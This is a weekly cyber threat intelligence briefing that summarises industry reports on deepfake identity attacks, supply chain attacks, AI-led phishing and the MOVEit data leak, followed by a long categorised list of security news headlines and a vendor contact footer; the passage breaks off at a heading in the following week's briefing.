Entrust has reported that deepfake attacks are occurring every five minutes in 2024, posing a significant threat to digital identity verification systems. The report found that deepfakes account for 24% of fraudulent attempts to bypass motion-based biometric checks used by banks and service providers. In contrast, only 5% of these attacks target basic selfie-based authentication methods. The growing accessibility of generative AI technology is enabling fraudsters to circumvent advanced security measures. Entrust highlighted that organisations must proactively adapt their security strategies, as these evolving threats are pervasive across all sectors.
Supply Chain Attacks Up Over 400% Since 2021
Cowbell Insurance has found that supply chain attacks have surged by 431% since 2021. Large enterprises with over $50 million in revenue are 2.5 times more likely to face cyber incidents. Manufacturing is the most vulnerable sector due to its reliance on automation and exposure to intellectual property threats. Public administration and educational services also face elevated risks, with a 70% increase in attacks on educational institutions over the past year. The report identifies five risky technology categories: operating systems, content management tools, virtualisation technologies, server-side technologies, and business applications. No business is immune to cyber threats and the consequences can be devastating.
Rethinking Cyber Security from Cost Centre to Value Driver
A University of Maryland study found that cyber attacks occur every 39 seconds, amounting to 2,244 attacks daily. Cybersecurity Ventures predicts annual cyber damages will reach $10.5 trillion by 2025. Despite these alarming figures, many organisations treat cyber security as a minimal compliance exercise. Leadership must transform this approach by integrating cyber security into business strategy, fostering a culture of trust and resilience. By prioritising employee training and leveraging technologies like artificial intelligence, companies can enhance customer loyalty, avoid regulatory issues, and shift cyber security from a cost centre to a value driver.
Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey
Vodafone Business has found that most UK businesses are unprepared for the rapid rise in AI-led phishing attacks, which have increased 60% globally over the past year. Despite over three quarters of business leaders expressing confidence in employees' ability to detect scams, only a third could identify fraudulent communications. The report highlighted that over half of UK businesses lack a response plan for AI-driven phishing, and younger employees are particularly susceptible, with nearly half aged 18 to 24 not updating passwords in over a year.
Sources:
https://www.emergingrisks.co.uk/cyber-criminals-dont-take-holidays-warns-expert/
https://www.securityweek.com/the-urgent-and-critical-need-to-prioritize-mobile-security/
https://www.infosecurity-magazine.com/news/companies-seven-months-recover/
https://www.theregister.com/2024/11/20/data_is_the_new_uranium/
https://www.zdnet.com/article/scam-yourself-attacks-just-increased-over-600-heres-what-to-look-for/
https://www.infosecurity-magazine.com/news/60-emails-qr-codes-spam-malicious/
https://www.reinsurancene.ws/coalition-highlights-68-surge-in-ransomware-claims-severity/
https://securityintelligence.com/news/research-finds-56-percent-increase-active-ransomware-groups/
https://www.infosecurity-magazine.com/news/deepfake-identity-attack-every/
https://betanews.com/2024/11/21/supply-chain-attacks-up-over-400-percent-since-2021/
Governance, Risk and Compliance
Cyber security dominates concerns among the C-suite, small businesses and the nation
Rethinking Cyber Security From Cost Center To Value Driver
So, you don’t have a chief information security officer? 9 signs your company needs one | CSO Online
Cyber criminals don’t take holidays warns expert
Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media
Data is the new uranium – both powerful and dangerous • The Register
Cyber Security is Everyone’s Responsibility - Security Boulevard
Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly
Hackers Aren’t Cutting Back, Why is Your Security Budget?
Full recovery from breaches takes longer than expected - Help Net Security
Google report shows CISOs must embrace change to stay secure - Help Net Security
Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs
Emerging Security Practices in Digital Finance: By Shiv Nanda
Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop
Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE
Interconnectivity and cyber risk: A double-edged sword - IT Security Guru
We Can Do Better Than Free Credit Monitoring After a Breach
Breaches Don't Have to Be Disasters
CISOs can now obtain professional liability insurance | CyberScoop
Experts warn businesses of escalating cyber security threats
CISOs Look to Establish Additional Leadership Roles - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
Armis: Triple Extortion Attacks Becoming More Common | SC Media UK
Research finds 56% increase in active ransomware groups
Ransomware gang Akira leaks unprecedented number of victims’ data in one day
Ransomware is doubling down—What you need to know about the recent surge - Security Boulevard
Akira Ransomware Racks Up 30+ Victims in a Single Day
Cloud ransomware threats rise, targeting S3 & Azure
FBI says BianLian based in Russia, moving from ransomware attacks to extortion
Ransomware Evolution: From Triple-Quadruple Extortion to RaaS - Security Boulevard
Coalition highlights 68% surge in ransomware claims severity - Reinsurance News
Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine
Hibernation is Over? Akira Ransomware: Published Over 30 New Victims on their DLS – DataBreaches.Net
Ransomware attacks primarily caused by poor cyber hygiene | SC Media
Cyber insurers address ransom reimbursement policy concerns | TechTarget
Ransomware Gangs on Recruitment Drive for Pen Testers - Infosecurity Magazine
Trellix report reveals evolving ransomware ecosystem trends
Security Bite: Ransomware groups surge in Q3 2024, with shifting dominance - 9to5Mac
Ransomware Attacks On Healthcare Sector Surge In 2024
Linux Variant of Helldown Ransomware Targets VMware
Helldown ransomware exploits Zyxel VPN flaw to breach networks
Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop
Threat Landscape: Corporate Japan Its Own Worst Enemy in the Ransomware War | Nippon.com
Ransomware Victims
How the British Library hack has caused havoc for UK research
SafePay ransomware gang claims attack on UK's Microlise • The Register
Ransomware Attack on Oklahoma Medical Center Impacts 133,000 - SecurityWeek
Change Healthcare’s clearing house restored after 9 months • The Register
Phishing & Email Based Attacks
Phishing emails increasingly use SVG attachments to evade detection
Communication platforms play a major role in data breach risks
You're Not Imagining It: Phishing Attacks Are Rampant
Why email security is still so bad today - 9to5Mac
Why AI alone can't protect you from sophisticated email threats - Help Net Security
Phishing Decoded: How Cyber Criminals Target You And How To Fight Back
Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey
60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine
What is a whaling attack (whaling phishing)? | Definition from TechTarget
Job termination scam warns staff of phony Employment Tribunal decision | CSO Online
'Scattered Spider' scammers charged in sophisticated, million-dollar phishing scheme | Mashable
Microsoft Takes Phishing-as-a-Service Platform to Court
Fake Donald Trump Assassination Story Used in Phishing Scam - Infosecurity Magazine
No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin
Microsoft 365 Admin portal abused to send sextortion emails
North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine
New phishing scam targeting companies with fake gov’t requests: What FBI says to do
Other Social Engineering
60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine
NCSC Warns UK Shoppers Lost £11.5m Last Christmas - Infosecurity Magazine
6 Reasons Social Engineering Is More Successful in Holiday Seasons | Mimecast
'Scam yourself' attacks just increased over 600% - here's what to look for | ZDNET
Malicious QR codes sent in the mail deliver malware | Malwarebytes
UK consumers losing more than ever to holiday scams | Computer Weekly
Fake Discount Sites Exploit Black Friday to Hijack Shopper Information
Security Alert: Fake Accounts Threaten Black Friday Gaming Sales - Security Boulevard
‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine
Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop
Watch Out for Malicious QR Codes Sent Through the Mail
Cyber security chief warns Black Friday shoppers to be alert to scams | The Standard
Don't Fall for This Fake Image Generator and Its Political AI Slop
No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin
Active network of North Korean IT front companies exposed - Help Net Security
You Can Prevent Smishing Scams With These Features and Tricks
Artificial Intelligence
AI fuels 244% surge in digital forgeries, says new study
97% of organisations hit by Gen AI-related security breaches, survey finds
One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine
Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks
Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey
Largest Companies View AI as a Risk Multiplier
Don't Fall for This Fake Image Generator and Its Political AI Slop
Phishing on the Rise: CUJO AI Blocks Over 12,000 Attacks per Minute
The limits of AI-based deepfake detection - Help Net Security
OWASP Warns of Growing Data Exposure Risk from AI in New Top 10 List - Infosecurity Magazine
Supply chain threats highlight security gaps in LLMs and AI | TechRadar
AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard
Fake AI video generators infect Windows, macOS with infostealers
AI About-Face: 'Mantis' Turns LLM Attackers Into Prey
Artificial intelligence, international security, and the risk of war
Did you play Pokémon Go? You didn't know it, but you were training AI to map the world | ZDNET
Malware
Phishing emails increasingly use SVG attachments to evade detection
Don’t Hold Down The Ctrl Key—New Warning As Cyber Attacks Confirmed
Malicious QR codes sent in the mail deliver malware | Malwarebytes
Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek
‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine
Watch Out for Malicious QR Codes Sent Through the Mail
New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers
Scammers resort to physical Swiss post to spread malware • The Register
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
Don't Fall for This Fake Image Generator and Its Political AI Slop
Fake AI video generators infect Windows, macOS with infostealers
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data
Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials
Botnet exploits GeoVision zero-day to install Mirai malware
Researchers unearth two previously unknown Linux backdoors - Help Net Security
Lumma Stealer Proliferation Fueled by Telegram Activity - Infosecurity Magazine
Black Lotus, Emotet, Beep, and Dark Pink, still the top malware threats of 2024 | SC Media
Microsoft accused of Malware-like Bing Wallpaper app - gHacks Tech News
Bots/Botnets
'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse
Dangerous global botnet fueling residential proxies is being hit in major crackdown | TechRadar
Botnet serving as ‘backbone’ of malicious proxy network taken offline | CyberScoop
Mobile
The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek
No work phone? Companies tell staff to bring their own
Mobile UK on fraud ahead of Reeves' Mansion House speech
Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks
Protect Your Phone From Juice Jacking: Public Charging Risks Explained
New Ghost Tap attack abuses NFC mobile payments to steal money
NSO Group used another WhatsApp zero-day after being sued, court docs say
LightSpy Spyware Operation Expands to Windows - SecurityWeek
It’s Time to Get Paranoid About Your Phone, Says This Security Expert | KQED
iOS 18 reboots iThings after 72 hours - secretly and smartly • The Register
This hacking tool can unlock an iPhone 16. Here's how it works | Digital Trends
You Can Prevent Smishing Scams With These Features and Tricks
Denial of Service/DoS/DDoS
DDoS Attack Growing Bigger & Dangerous, New Report Reveals
Internet of Things – IoT
Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek
'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse
Eken hit with $700K fine for putting an inactive address on FCC filings - The Verge
Data Breaches/Leaks
Ten Lessons Learned from The Mother of All Breaches Data Leak - Security Boulevard
97% of organisations hit by Gen AI-related security breaches, survey finds
Fintech giant Finastra confirms it's investigating a data breach | TechCrunch
Equinox discloses data breach involving health info of clients, staff | Reuters
T-Mobile confirms it was hacked in recent wave of telecom breaches
What is Data Egress? How It Works and How to Manage Costs | Definition from TechTarget
Threat actor sells data of +750,000 patients from a French hospital
US-UK Armed Forces Dating Service Exposes Over 1 Million Records Online
We Can Do Better Than Free Credit Monitoring After a Breach
Breaches Don't Have to Be Disasters
The Crucial Influence of Human Factors in Security Breaches - Security Boulevard
171K AnnieMac customers informed of data breach • The Register
Space tech giant Maxar confirms hacker accessed employees' personal data | TechCrunch
Ford 'actively investigating' breach claims • The Register
Ford rejects breach allegations, says customer data not impacted
Helpline for Yakuza victims fears it leaked personal info • The Register
Andrew Tate Hack: Online Course Data Breached
Organised Crime & Criminal Actors
Cyber criminals don’t take holidays warns expert
Microsoft killed 240 sites selling ONNX phishing kits
5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme
Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek
Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News
Targeting the Cyber Crime Supply Chain - Microsoft On the Issues
US seizes PopeyeTools cyber crime marketplace, charges administrators
AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard
Russian women stepping up for cyber crime outfits | SC Media
UK supports Nigeria to tackle cyber threats
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek
Now BlueSky hit with crypto scams as it crosses 20 million users
Insider Risk and Insider Threats
The Crucial Influence of Human Factors in Security Breaches - Security Boulevard
Insurance
Coalition highlights 68% surge in ransomware claims severity - Reinsurance News
Cyber insurers address ransom reimbursement policy concerns | TechTarget
Marsh launches cyber security compliance program | Insurance Business America
CISOs can now obtain professional liability insurance | CyberScoop
Supply Chain and Third Parties
Supply chain attacks up over 400 percent since 2021
Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs
IT pros revise pipelines for software supply chain security | TechTarget
Gatwick Airport's Cyber Security Chief on Supply Chain Risks - Infosecurity Magazine
Cloud/SaaS
Cloud ransomware threats rise, targeting S3 & Azure
Cracking the Code: Tackling the Top 5 Cloud Security Challenges - Security Boulevard
Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine
Outages
After the CrowdStrike disaster, Microsoft is improving Windows security to avoid outages
Identity and Access Management
One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine
The trouble with identity in an increasingly fake world | SC Media
Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority
10 Most Impactful PAM Use Cases for Enhancing Organisational Security
Encryption
Now Online Safety Act is law, UK outlines 'priorities' • The Register
NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition
Linux and Open Source
Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root
Debunking myths about open-source security - Help Net Security
Linux Variant of Helldown Ransomware Targets VMware
Researchers unearth two previously unknown Linux backdoors - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
123456 is the world's most popular password – again | Tom's Guide
Research Highlights SHA256 Password Security Strengths and Risks - IT Security Guru
700,000 passengers suffered delays after password of engineer allowed to work remotely... - LBC
Navigating NIST’s updated password rotation guidelines | TechRadar
More than 200 major companies already support passkeys
Put your usernames and passwords in your will, Japan advises • The Register
Social Media
Ireland orders X, TikTok and Instagram to curb terrorist content | Ireland | The Guardian
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data
Canada Shuts Down TikTok Office Over National Security Risks
Now BlueSky hit with crypto scams as it crosses 20 million users
Malvertising
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data
How does malvertising work? | TechTarget
Training, Education and Awareness
Cyber Awareness Is a Joke: Here’s How to Actually Prepare for Attacks
New educational campaign "Flex Your Cyber" launched - IT Security Guru
KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience - IT Security Guru
Regulations, Fines and Legislation
The SEC Cyber Security Rule: Awareness Rises, Compliance Lags - Security Boulevard
The Cyber Resilience Act published
NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra
ENISA's Draft NIS2 Guidance Consultation for Industry
Beyond The EU: How British Businesses Can Prepare For NIS2
EU Council approves declaration on international law in cyber space - JURIST - News
Preparing for DORA Compliance in 2025 - Financial News
Increased GDPR Enforcement Highlights the Need for Data Security
A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine
Now Online Safety Act is law, UK outlines 'priorities' • The Register
What CISOs need to know about the SEC’s breach disclosure rules | CSO Online
CISA no more? Rand Paul has a plan, and it’s not good for US cyber defenders | Cybernews
Trump 2.0 May Mean Fewer Cyber Security Regs
The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog
What a second Trump term means for the future of ransomware | TechCrunch
Why the NIS2 Directive causes growing pains for businesses - Help Net Security
CISA Dir. Jen Easterly to Resign on Inauguration Day
With Tech Considerations for Securities Lawyers | Mayer Brown Free Writings + Perspectives - JDSupra
Models, Frameworks and Standards
A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine
The Cyber Resilience Act published
NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra
ENISA's Draft NIS2 Guidance Consultation for Industry
Beyond The EU: How British Businesses Can Prepare For NIS2
Preparing for DORA Compliance in 2025 - Financial News
Increased GDPR Enforcement Highlights the Need for Data Security
NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition
Backup and Recovery
Five backup lessons learned from the UnitedHealth ransomware attack - Help Net Security
Law Enforcement Action and Take Downs
5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme
Brit charged in US over Scattered Spider cyber attacks | Computer Weekly
Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek
US seizes PopeyeTools cyber crime marketplace, charges administrators
Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News
Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop
UK supports Nigeria to tackle cyber threats
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Artificial intelligence, international security, and the risk of war
Sweden, Finland and Norway release new advice on surviving war - BBC News
Nation State Actors
China
A Look at Trending Chinese APT Techniques | Intel 471
UK warned of cyber threats from China-backed Volt Typhoon
China Espionage Soon ‘the Number 1 Issue’ for US Security Community: Cyber Security Expert | NTD
Chinese hackers are using this open-source VPN to mask spying activities | TechRadar
T-Mobile confirms it was hacked in recent wave of telecom breaches
Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign
Cyber-espionage group Volt Typhoon resurfaces globally
LightSpy Spyware Operation Expands to Windows - SecurityWeek
China-Backed Hackers Leverage SIGTRAN, GSM Protocols to Infiltrate Telecom Networks
Chinese APT Group Targets Telecom Firms Linked to BRI - Infosecurity Magazine
Chinese spies, Musk’s biz ties, ‘a real risk’ to US security • The Register
Chinese spies and the security of America's networks
China's Liminal Panda APT Attacks Telcos, Steals Data
Chinese ship casts shadow over Baltic subsea cable snipfest • The Register
Canada Shuts Down TikTok Office Over National Security Risks
Lithuania bans remote Chinese access to solar, wind, storage devices – pv magazine International
Coast Guard Warns of Continued Risks in Chinese Port Cranes
Russia
Severed subsea internet cables raise network security questions | ITPro
Sweden, Finland and Norway release new advice on surviving war - BBC News
Russian women stepping up for cyber crime outfits | SC Media
FBI says BianLian based in Russia, moving from ransomware attacks to extortion
BianLian Ransomware Group Adopts New Tactics, Posing Significant Risk - Infosecurity Magazine
Russian sanctions busting linked to British Overseas Territories
Undersea cable between Germany and Finland severed - BBC News
Finland and Lithuania Report Severed Undersea Data Cables - Bloomberg
Fears of sabotage rise after Baltic cable disruptions
North Korea
North Korean Front Companies Impersonate US IT Firms to Fund Missile Programs
Active network of North Korean IT front companies exposed - Help Net Security
North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
LightSpy Spyware Operation Expands to Windows - SecurityWeek
NSO Group used another WhatsApp zero-day after being sued, court docs say
The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog
Tools and Controls
The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek
No work phone? Companies tell staff to bring their own
Rethinking Cyber Security From Cost Center To Value Driver
Companies Take Over Seven Months to Recover From Cyber Incidents - Infosecurity Magazine
State of SIEM Detection Risk: A Wake-Up Call for Enterprise Security Teams - Security Boulevard
Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection - SecurityWeek
5 Threat Intel Tricks MSSPs Can Use to Thwart Adversaries | MSSP Alert
Underfunded, under pressure: We must act to support cyber teams | Computer Weekly
Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly
Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media
The trouble with identity in an increasingly fake world | SC Media
How Cloud Security Advances Help Future-Proof Resilience
Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority
Avoiding Common API Security Mistakes
Hackers Aren’t Cutting Back, Why is Your Security Budget?
Cross-Site Scripting: 2024's Most Dangerous Software
Cyber criminals hijack DNS to build stealth attack networks - Help Net Security
Unlocking the power of public data to make your security team faster and more effective | SC Media
Safeguarding the DNS through registries - Help Net Security
Red red team team: threat actors hire pentesters to test out ransomware effectiveness | SC Media
Weaponized pen testers are becoming a new hacker staple | CSO Online
5 Questions CISOs Should Be Asking Regarding DSPM
8 Security Risks Of Shared Email Accounts - Security Boulevard
Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE
Eight essential steps to fortify cyber security after a breach | SC Media
The limits of AI-based deepfake detection - Help Net Security
Navigating NIST’s updated password rotation guidelines | TechRadar
How Can PR Protect Companies During a Cyber Attack?
We Need to Talk: Breaking up With Your SIEM Vendor | MSSP Alert
Other News
Severed subsea internet cables raise network security questions | ITPro
Cyber Security is Everyone’s Responsibility - Security Boulevard
8 Security Risks Of Shared Email Accounts - Security Boulevard
300 Drinking Water Systems in US Exposed to Disruptive, Damaging Hacker Attacks - SecurityWeek
Cross-Site Scripting: 2024's Most Dangerous Software
Weaponized pen testers are becoming a new hacker staple | CSO Online
Eight essential steps to fortify cyber security after a breach | SC Media
Telecom Cable Disruption Reported Between Finland and Germany - Nord News
Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop
Cyber attack leaves Stop & Shop shelves empty 10 days before Thanksgiving - CBS News
6 Ways Your Computer Isn't as Secure as You Think
The rising tide of maritime cyberthreats in global trade | TechRadar
Nearly 90% of UK industrial firms hit by cyber attacks in past year - Drives&Controls
ICS Security: 145,000 Systems Exposed to Web, Many Industrial Firms Hit by Attacks - SecurityWeek
5 alarming Windows cyber security facts you probably don’t know
Cisco reveals top cyber security threats trends
Expert warns construction industry on costly ransomware attacks | Project Scotland
Australian government cyber security falls in global ranking | The Canberra Times | Canberra, ACT
Cyber security tips for the education sector | Education Business
Navigating the surge of cyber threats in global maritime
Thames Water Dismisses Claims on Cyber-Attacks | SC Media UK
Fortra Reports Alarming Increase In Abuse Of Cloudflare Services
Airplane cyber security: Past, present, future
70% of Hong Kong companies saw cyber attacks in 2024
Gambling and lottery giant disrupted by cyber attack, working to bring systems back online
CISA Director Jen Easterly to depart agency on January 20 | TechCrunch
Vulnerability Management
Microsoft beefs up Windows security with new recovery and patching features | TechCrunch
CWE top 25 most dangerous software weaknesses - Help Net Security
MITRE shares 2024's top 25 most dangerous software weaknesses
Vulnerabilities
Critical 9.8-rated VMware vCenter RCE bug under exploit • The Register
Warning: VMware vCenter and Kemp LoadMaster Flaws Under Active Exploitation
Microsoft Vulnerability Poses Risk To Domain Control
Critical RCE bug in VMware vCenter Server now exploited in attacks
Mystery Palo Alto Networks 0-day RCE now actively exploited • The Register
PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released
Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek
Millions of WordPress sites potentially hijackable due to critical plugin bug | SC Media
Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities
Chrome Security Update, Fix For Multiple Vulnerabilities
Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root
Fortinet VPN design flaw hides successful brute-force attacks
Microsoft pauses Exchange security updates over buggy patch • The Register
Microsoft Pulls Exchange Patches Amid Mail Flow Issues
Security plugin flaw in millions of WordPress sites gives admin access
Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) - Help Net Security
Linux Variant of Helldown Ransomware Targets VMware
Exploitation Attempts Target Citrix Session Recording Vulnerabilities - SecurityWeek
Helldown ransomware exploits Zyxel VPN flaw to breach networks
NSO Group used another WhatsApp zero-day after being sued, court docs say
D-Link urges users to retire VPN routers impacted by unfixed RCE flaw
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 15 November 2024
Black Arrow Cyber Threat Intelligence Briefing 15 November 2024:
-Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies
-Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics
-Critical Vulnerabilities Persist in Finance and Insurance Sectors
-AI-Based Attacks Top Gartner’s List of Emerging Threats – Again
-Here Are the Top 10 Passwords for 2024, and They're All Embarrassing
-Mishing: The Rising Mobile Attack Vector Facing Every Organisation
-80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis
-BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks
-Employees Are Hiding Their AI Use from Their Managers. Here's Why
-CISOs in 2025: Balancing Security, Compliance, and Accountability
-48% of Small Businesses Don’t Offer Cyber Security Training
-Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies
A recent massive data breach exploiting a vulnerability in MOVEit file transfer software has exposed sensitive employee data from major companies globally. This incident is one of the largest corporate information leaks, affecting sectors such as finance, healthcare, technology, and retail. The breach resulted in detailed employee records being stolen from 25 leading organisations, including Amazon with over 2.8 million records and MetLife with over 585,000 records. The leaked data includes names, email addresses, phone numbers, and organisational structures, posing significant risks for phishing and identity theft. This incident highlights the critical importance of promptly applying security patches and reinforces the need for robust cyber security measures to protect sensitive corporate data.
Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics
A recent report has found that phishing attacks surged by 28% in Q2 2024, with cybercriminals adopting AI tools and multi-channel tactics. Organisations with over 2,000 employees now face approximately 36 phishing emails per day, overwhelming security systems. There was a 52.2% increase in phishing attacks that bypass secure email gateways, using techniques like QR codes, deepfakes, and HTML smuggling. Payloadless attacks (phishing without links or attachments, instead using social engineering to deceive victims) have risen to nearly 19% of phishing attempts in 2024, up from 5.4% in 2021. Businesses must enhance security measures and foster awareness to combat these sophisticated threats.
Critical Vulnerabilities Persist in Finance and Insurance Sectors
Cyber security provider Black Duck has found that the finance and insurance sectors have the highest number of critical vulnerabilities, with small sites averaging 565 and medium sites 580. Healthcare and social assistance follow closely behind. The most critical issues identified were cryptographic failures and injection vulnerabilities, totalling over 34,800 instances. These weaknesses threaten sensitive data like personally identifiable information and financial records, posing significant business risks. The mean time to remediate varies, with finance addressing issues in 28 days due to strict regulations, while utilities take up to 107 days. Widespread security misconfigurations affect 98% of applications, endangering business continuity and service availability.
AI-Based Attacks Top Gartner’s List of Emerging Threats – Again
Gartner reports that AI-based threats remain the top emerging cyber risks for organisations, with 80% of surveyed executives highlighting AI-enhanced malicious attacks as a major concern. This marks the third consecutive quarter where AI leads in risk rankings. The difficulty in finding skilled AI and cyber security talent is prompting companies to turn to Managed Security Service Providers (MSSPs) for assistance. MSSPs are leveraging AI to combat sophisticated cyber attacks, and over 80% now offer AI-related security services. This represents a significant shift as enterprises struggle to protect themselves against increasingly complex AI-driven threats.
Here Are the Top 10 Passwords for 2024, and They're All Embarrassing
NordPass, in collaboration with NordStellar, has found that weak passwords remain a significant security risk for organisations and individuals alike. Their sixth annual report revealed that '123456' is the most common password globally, used by over 3 million personal users and more than 1.2 million corporate users. The report highlighted that despite increased awareness of password security, it takes less than a second to crack these widely used passwords. Nearly all organisations still face password management challenges, with many employees reusing simple passwords across accounts. The study underscores the need for stronger password practices, including adopting password managers.
Mishing: The Rising Mobile Attack Vector Facing Every Organisation
Recent research highlights that mobile-targeted phishing attacks, collectively termed "mishing", are an escalating threat to organisations. The widespread use of mobile devices for accessing sensitive data has made them prime targets for cyber criminals employing tactics like smishing, vishing and quishing. These attacks exploit unique mobile features, increasing user vulnerability. Despite this rising threat, many organisations lack adequate mobile security measures and underestimate the associated risks. To combat mishing, it is imperative for organisations to implement comprehensive mobile threat defences and educate employees on recognising and avoiding such attacks.
80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis
Riskonnect's recent report highlights that 80% of organisations lack a dedicated plan to address generative AI risks, including AI-driven fraud attacks. Among surveyed professionals, 72% reported that cyber security risks are having a significant or severe impact on their organisations (an increase from last year's 47%) and 24% believe AI-powered cyber security threats will have the biggest impact over the next 12 months. Despite growing concerns over AI ethics, privacy, and security, 65% of companies have not established policies governing the use of generative AI by partners and suppliers, leaving critical risk management gaps unaddressed.
BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks
